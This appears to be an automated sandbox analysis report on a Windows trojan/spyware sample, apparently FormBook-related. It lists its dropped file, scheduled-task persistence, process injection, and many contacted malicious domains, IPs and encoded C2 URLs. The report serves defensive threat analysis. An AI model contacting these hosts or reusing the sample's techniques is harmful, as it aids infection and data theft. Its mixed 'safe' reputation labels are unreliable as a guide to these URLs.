(likely to bypass EDR) 49->79 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Inquiry PR#27957.bat.exe34%ReversingLabsWin32.Trojan.Generic
            Inquiry PR#27957.bat.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\fuqwoDzun.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\fuqwoDzun.exe34%ReversingLabsWin32.Trojan.Generic

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.viertage.work/br0f/0%Avira URL Cloudsafe
            http://www.ffi07s.xyz/y7ar/?lv-=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR8/YoVsWf93Za6ivLQbcIgoRaZNPJDw==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            http://www.xn72dkd7scx.shop/emnz/0%Avira URL Cloudsafe
            http://www.globaltrend.xyz/srh8/?lv-=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Tl/MEdpNR0v4ePERtHY07mFLqmHNNg==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            http://www.tp-consulting.net/3ooi/0%Avira URL Cloudsafe
            http://www.globaltrend.xyz0%Avira URL Cloudsafe
            http://www.dynamologistics.net/s992/0%Avira URL Cloudsafe
            http://www.alphacentura.com/mnr7/0%Avira URL Cloudsafe
            https://http.gn301.com:12345/?u=0%Avira URL Cloudsafe
            http://www.dtalengineering.com/la5g/?lv-=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgqw8nEMVyZqzJ1NN5IW2O5lnTqqMxQQ==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            https://www.u9games.xyz/5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L50%Avira URL Cloudsafe
            https://ventraip.com.au/favicon.ico0%Avira URL Cloudsafe
            http://www.ffi07s.xyz/y7ar/0%Avira URL Cloudsafe
            http://www.dospole.top/soqq/0%Avira URL Cloudsafe
            http://www.viertage.work/br0f/?lv-=ugi+9bpxNAaZR8wICrxq2eMEzwxItzjvBeZsufXo3FfvAETDHi1JbXCTNdvb4BDU5HS2z+wM6O9UukgZHdIpmHivweVWPh9LzIjwD/7QkR1e8x0qwg==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            http://www.xn72dkd7scx.shop/emnz/?lv-=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK8/RlnoJvqmanf4TUTsYPUhTHcRSC+WQ==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            http://www.9988566a4.shop0%Avira URL Cloudsafe
            http://www.alphacentura.com/mnr7/?GJtTF=-FH8yJw&lv-=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxqOSodO53aJITzDoCBcybRFuSCV6gKg==0%Avira URL Cloudsafe
            http://www.9988566a4.shop/roex/0%Avira URL Cloudsafe
            http://www.dtalengineering.com/la5g/0%Avira URL Cloudsafe
            http://www.dospole.top/soqq/?GJtTF=-FH8yJw&lv-=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7kx7woR32YUW8PWQ95aiNipO8bO2C7yA==0%Avira URL Cloudsafe
            http://www.tp-consulting.net/3ooi/?lv-=1LFRRoLbVcSYXTZ6XdBa3kkSOtIcXt0xuK7G7zAfyuAyg5iI4oE5vIWxJ/ECDOK7eTrBqgzuJv49CznNGJBB0jFuKD1kyeaZBLZ0jvvkrC/dFa2PYg==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://www.j51a.xyz/y0md/0%Avira URL Cloudsafe
            http://www.u9games.xyz/5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE8oduNyVeBv0iNKG92SjPfl0JtCvCvw==0%Avira URL Cloudsafe
            https://badges.ausowned.com.au/076340%Avira URL Cloudsafe
            http://www.9988566a4.shop/roex/?lv-=47/hzVl8DcmSvoQ5q5p0wIxjDl6sc/p2osL1e58noL7mmdwCeRUqiv3Sczuo1RIrkshpBASuVUC/h9VDFMrIc6PlwYO66SdA0FrSeVnyMCMUxRe8Kg==&GJtTF=-FH8yJw0%Avira URL Cloudsafe
            http://www.dynamologistics.net/s992/?GJtTF=-FH8yJw&lv-=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/to3skHw9ZCkuDTXhooUuE0PnQLiimQ==0%Avira URL Cloudsafe
            http://www.globaltrend.xyz/srh8/0%Avira URL Cloudsafe
            https://www.xn72dkd7scx.shop/emnz/?lv-=oBBn57UjS7mF6OBjtXCA4K/r3FCs0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.dynamologistics.net
            		35.212.86.52
            		truetrue
              		unknown
              www.viertage.work
              		185.181.104.242
              		truetrue
                		unknown
                www.tp-consulting.net
                		5.252.229.221
                		truetrue
                  		unknown
                  weien.cdn.youziyuncdn.com
                  		134.122.138.60
                  		truetrue
                    		unknown
                    www.dtalengineering.com
                    		103.42.108.46
                    		truetrue
                      		unknown
                      www.ffi07s.xyz
                      		188.114.96.3
                      		truetrue
                        		unknown
                        wegamovies.online
                        		84.32.84.32
                        		truetrue
                          		unknown
                          www.globaltrend.xyz
                          		188.114.97.3
                          		truetrue
                            		unknown
                            huayang.302.gn301.xyz
                            		154.12.34.252
                            		truetrue
                              		unknown
                              www.dospole.top
                              		162.254.38.56
                              		truetrue
                                		unknown
                                rightol.net
                                		94.130.217.114
                                		truetrue
                                  		unknown
                                  ghs.googlehosted.com
                                  		142.250.185.211
                                  		truefalse
                                    		unknown
                                    tou6y19.tta88.com
                                    		38.145.202.186
                                    		truetrue
                                      		unknown
                                      www.alphacentura.com
                                      		188.114.96.3
                                      		truetrue
                                        		unknown
                                        www.u9games.xyz
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.lexpaidshares.online
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.xn72dkd7scx.shop
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.wegamovies.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.j51a.xyz
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.rightol.net
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.9988566a4.shop
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.viertage.work/br0f/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.globaltrend.xyz/srh8/?lv-=IQYINTaWkaojOw8AeeCEPfEIeYkq+BJ0MxZ2KDKAvD89Td2DcEp1Lez+9d6wDeiGuMtHeyxXV+kcq5RzRjH8Tl/MEdpNR0v4ePERtHY07mFLqmHNNg==&GJtTF=-FH8yJwtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tp-consulting.net/3ooi/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ffi07s.xyz/y7ar/?lv-=MrLs2OZQS9tqlK4Srgs+GAHAbHC9a9uyqM6nyvTx+aYY18R7NjkvoreXBqubaQ9RYarkm74io0l/Sb1qLPuR8/YoVsWf93Za6ivLQbcIgoRaZNPJDw==&GJtTF=-FH8yJwtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.xn72dkd7scx.shop/emnz/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dtalengineering.com/la5g/?lv-=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgqw8nEMVyZqzJ1NN5IW2O5lnTqqMxQQ==&GJtTF=-FH8yJwtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ffi07s.xyz/y7ar/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.alphacentura.com/mnr7/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dynamologistics.net/s992/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.alphacentura.com/mnr7/?GJtTF=-FH8yJw&lv-=pvT+HB9YRKI+POQx0b/M/ubgxhqpaEX2BZjJkbsJzaX5mdbcin6Kt2D9XOjpJuvlAq8EfVvHU99Z+IER5VLxqOSodO53aJITzDoCBcybRFuSCV6gKg==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.viertage.work/br0f/?lv-=ugi+9bpxNAaZR8wICrxq2eMEzwxItzjvBeZsufXo3FfvAETDHi1JbXCTNdvb4BDU5HS2z+wM6O9UukgZHdIpmHivweVWPh9LzIjwD/7QkR1e8x0qwg==&GJtTF=-FH8yJwtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dospole.top/soqq/?GJtTF=-FH8yJw&lv-=drOPoC+fcqVNsUc6VHZGLsfUz53xK80s09TfdoGgIRC+cuJysSYyQ9s+Q6Hx730bczsRaNUrXI+2DBjO7h7kx7woR32YUW8PWQ95aiNipO8bO2C7yA==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dospole.top/soqq/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dtalengineering.com/la5g/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.9988566a4.shop/roex/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.xn72dkd7scx.shop/emnz/?lv-=oBBn57UjS7mF6OBjtXCA4K/r3FCs+xzFf261ivHj6HGHsVKs3oxX4EX17CbJWppp6g6A8fr9hGSE2paVCFK8/RlnoJvqmanf4TUTsYPUhTHcRSC+WQ==&GJtTF=-FH8yJwtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tp-consulting.net/3ooi/?lv-=1LFRRoLbVcSYXTZ6XdBa3kkSOtIcXt0xuK7G7zAfyuAyg5iI4oE5vIWxJ/ECDOK7eTrBqgzuJv49CznNGJBB0jFuKD1kyeaZBLZ0jvvkrC/dFa2PYg==&GJtTF=-FH8yJwtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.u9games.xyz/5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE8oduNyVeBv0iNKG92SjPfl0JtCvCvw==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.j51a.xyz/y0md/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.9988566a4.shop/roex/?lv-=47/hzVl8DcmSvoQ5q5p0wIxjDl6sc/p2osL1e58noL7mmdwCeRUqiv3Sczuo1RIrkshpBASuVUC/h9VDFMrIc6PlwYO66SdA0FrSeVnyMCMUxRe8Kg==&GJtTF=-FH8yJwtrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.dynamologistics.net/s992/?GJtTF=-FH8yJw&lv-=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/to3skHw9ZCkuDTXhooUuE0PnQLiimQ==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.globaltrend.xyz/srh8/true
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabsfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/ac/?q=sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icosfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.globaltrend.xyzsfc.exe, 00000011.00000002.3790282223.00000000043AE000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.000000000382E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://http.gn301.com:12345/?u=sfc.exe, 00000011.00000002.3790282223.00000000046D2000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.0000000003B52000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.ecosia.org/newtab/sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0Inquiry PR#27957.bat.exe, fuqwoDzun.exe.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ventraip.com.au/favicon.icosfc.exe, 00000011.00000002.3790282223.0000000003D66000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.00000000031E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.u9games.xyz/5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L5sfc.exe, 00000011.00000002.3790282223.0000000003BD4000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.0000000003054000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2097655190.000000000D334000.00000004.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.9988566a4.shopTsdBVAGjsKVoi.exe, 00000015.00000002.3791731697.0000000005105000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://badges.ausowned.com.au/07634sfc.exe, 00000011.00000002.3792533848.00000000061D0000.00000004.00000800.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3790282223.0000000003D66000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.00000000031E6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.csssfc.exe, 00000011.00000002.3790282223.0000000004864000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.0000000003CE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameInquiry PR#27957.bat.exe, 00000000.00000002.1351958774.0000000002F27000.00000004.00000800.00020000.00000000.sdmp, fuqwoDzun.exe, 0000000A.00000002.1568631756.0000000002779000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.xn72dkd7scx.shop/emnz/?lv-=oBBn57UjS7mF6OBjtXCA4K/r3FCssfc.exe, 00000011.00000002.3790282223.000000000408A000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.000000000350A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      185.181.104.242
                                                      		www.viertage.workGermany
                                                      		48596INWXDEtrue
                                                      188.114.97.3
                                                      		www.globaltrend.xyzEuropean Union
                                                      		13335CLOUDFLARENETUStrue
                                                      5.252.229.221
                                                      		www.tp-consulting.netPoland
                                                      		203417LHPLtrue
                                                      188.114.96.3
                                                      		www.ffi07s.xyzEuropean Union
                                                      		13335CLOUDFLARENETUStrue
                                                      142.250.185.211
                                                      		ghs.googlehosted.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      103.42.108.46
                                                      		www.dtalengineering.comAustralia
                                                      		45638SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUtrue
                                                      134.122.138.60
                                                      		weien.cdn.youziyuncdn.comUnited States
                                                      		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                      38.145.202.186
                                                      		tou6y19.tta88.comUnited States
                                                      		18978ENZUINC-UStrue
                                                      35.212.86.52
                                                      		www.dynamologistics.netUnited States
                                                      		19527GOOGLE-2UStrue
                                                      162.254.38.56
                                                      		www.dospole.topUnited States
                                                      		13768COGECO-PEER1CAtrue
                                                      142.250.185.147
                                                      		unknownUnited States
                                                      		15169GOOGLEUSfalse
                                                      154.12.34.252
                                                      		huayang.302.gn301.xyzUnited States
                                                      		54133UNMETEREDCAtrue

                                                      General Information

                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1470000
                                                      Start date and time:2024-07-09 12:06:24 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 11m 59s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:24
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:3
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Inquiry PR#27957.bat.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@25/16@17/12
                                                      EGA Information:
                                                      • Successful, ratio: 80%
                                                      HCA Information:
                                                      • Successful, ratio: 95%
                                                      • Number of executed functions: 110
                                                      • Number of non-executed functions: 327
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target TsdBVAGjsKVoi.exe, PID 6336 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: Inquiry PR#27957.bat.exe

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      06:07:14API Interceptor2x Sleep call for process: Inquiry PR#27957.bat.exe modified
                                                      06:07:16API Interceptor38x Sleep call for process: powershell.exe modified
                                                      06:07:20API Interceptor2x Sleep call for process: fuqwoDzun.exe modified
                                                      06:08:34API Interceptor10471706x Sleep call for process: sfc.exe modified
                                                      11:07:19Task SchedulerRun new task: fuqwoDzun path: C:\Users\user\AppData\Roaming\fuqwoDzun.exe

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      185.181.104.2422JQN1P3Y7e.exeGet hashmaliciousFormBookBrowse
                                                      • www.newworklife.space/gvv5/?0R-H=SXAtntdX4L&eF=ZMcbB6IUNmAlg7fbAPtreYFlEco2ApBQrt2Y6l1H+ZRz2eKO1FiRuJz17xYdo1ZEVUKmlyJbiN2xAIKNXOggnnrBGbim0xImVyf/SHwTXi7s
                                                      Universalmiddel169.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.newworklife.space/gvrw/?gHoDp=pzI/rrC1ouWmPeTy5wV8rpzlLst9BU/y/gUpEYo8R9AHcmUM4Air+pAqAy6btYHHWKXDT3hjn50EzHYr0Q/4IRZS/atyQviXyA==&7nX0d=4hl0d2qxplV
                                                      188.114.97.3http://threemanshop.comGet hashmaliciousUnknownBrowse
                                                      • threemanshop.com/cdn-cgi/images/cf-icon-server.png
                                                      http://threemanshop.comGet hashmaliciousUnknownBrowse
                                                      • threemanshop.com/favicon.ico
                                                      SecuriteInfo.com.Trojan.WinGo.Shellcoderunner.14178.1646.exeGet hashmaliciousUnknownBrowse
                                                      • source-update.hugratcat.top:2095/ws
                                                      DRAFT CONTRACT COPY_938840.scrGet hashmaliciousFormBookBrowse
                                                      • www.9muyiutyt.online/wf22/
                                                      738eb28a4f17d2292c8fc731a176539d2674fcb1b96d6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 483130cm.nyashka.top/VmPhpupdatedefaultLocal.php
                                                      NGL 700800.exeGet hashmaliciousFormBookBrowse
                                                      • www.oc7o0.top/2zff/?I4olCFhX=4L8xoD0W4Zo4sy88OPxzXkM4Et1OXrliZZOBxyE5jHDJEgkxN8cq+PG6NIXzy1XRCqQIvL5VyJCknvUNNLKk7znic/DfJyEGJbg1Pv28u2ofuxZkWteJjYs=&G0Wln=fJi8Hdr8
                                                      E3QY28nEGw.exeGet hashmaliciousUnknownBrowse
                                                      • source-update.hugratcat.top:2095/ws
                                                      PAZxQIjeuyCNRXg.exeGet hashmaliciousFormBookBrowse
                                                      • www.camperelektrikde.shop/dy13/?wj=8bNdgr3QvPw6/pDIZNt+55DvjzemDI0RO+pYD3qlulbIe6f7Sn3K06Z4F7nwygqHvoV4&CR-=CpfXQDw
                                                      xj40xovMsm.exeGet hashmaliciousAsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLineBrowse
                                                      • auth.xn--conbase-sfb.xyz/api/update2.pack
                                                      6cd8a052498b02d1f070d36dcc6540838193d35eee101.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 868920cm.nyashka.top/Lineserver.php
                                                      188.114.96.3http://threemanshop.comGet hashmaliciousUnknownBrowse
                                                      • threemanshop.com/favicon.ico
                                                      http://threemanshop.comGet hashmaliciousUnknownBrowse
                                                      • threemanshop.com/cdn-cgi/images/cf-icon-server.png
                                                      http://threemanshop.comGet hashmaliciousUnknownBrowse
                                                      • threemanshop.com/cdn-cgi/images/cf-icon-error.png
                                                      purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                                      • www.evoolihubs.shop/fwdd/?MdEl=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=&cv4D=Bv0xSH88iTF48zS0
                                                      475bc80ba1e4ac7b2f40f2a3e1a677a2ccf1ad7f5e5d5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 651186lm.nyashmyash.top/pipeRequestSecurePacketlowbigloaddefaultTempUploadsTemporary.php
                                                      4LPk0o7T6C.exeGet hashmaliciousFormBookBrowse
                                                      • www.mainz-cruise-deals.today/rn94/?CZbDp=fTeDovxhSZ2T70J&2ds=09eGDPUJepCFUU6E4tGoUe5x4dgTJ3zXonwB9AX7AS4ixaR6NbPwPSgI2hlgq7bEBXzd
                                                      xj40xovMsm.exeGet hashmaliciousAsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLineBrowse
                                                      • auth.xn--conbase-sfb.xyz/api.php?{B955B2CC07A01546086603}
                                                      Kxjf9xfVcb.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 911628cm.nyashka.top/imagevideopipehttpLowgameBigloadmultidleLocal.php
                                                      327vRde1h3nsEEG.exeGet hashmaliciousFormBookBrowse
                                                      • www.gemaroke2.shop/mc10/?qR-LsrxH=cH0r006G1k9BH3Prdi0o8oeF8aabeeFKkLVVuPEC0gCNiYJWCEK9irK+mrJ5aktgxtn1&TVm0xb=yj88DTHplR0
                                                      http://www.telegramkv.com/Get hashmaliciousUnknownBrowse
                                                      • www.telegramkv.com/

                                                      Domains

                                                      No context

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAUrCjg912Ssb.elfGet hashmaliciousMiraiBrowse
                                                      • 103.252.154.25
                                                      PO Number 00127011.exeGet hashmaliciousFormBookBrowse
                                                      • 110.232.143.110
                                                      https://members.stageschool.com.au/unsubscribe/Get hashmaliciousUnknownBrowse
                                                      • 110.232.143.111
                                                      QUOTATION #U2013 RFQ 000535.exeGet hashmaliciousFormBookBrowse
                                                      • 110.232.143.110
                                                      COTA#U00c7#U00c3O #U2013 RFQ 000535.exeGet hashmaliciousFormBookBrowse
                                                      • 110.232.143.110
                                                      ftrrrttyt.exeGet hashmaliciousFormBookBrowse
                                                      • 110.232.143.110
                                                      RFQ2024563429876-9887877654.exeGet hashmaliciousFormBookBrowse
                                                      • 110.232.143.110
                                                      file.exeGet hashmaliciousCMSBruteBrowse
                                                      • 43.250.142.104
                                                      TC0931AC.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 103.42.108.46
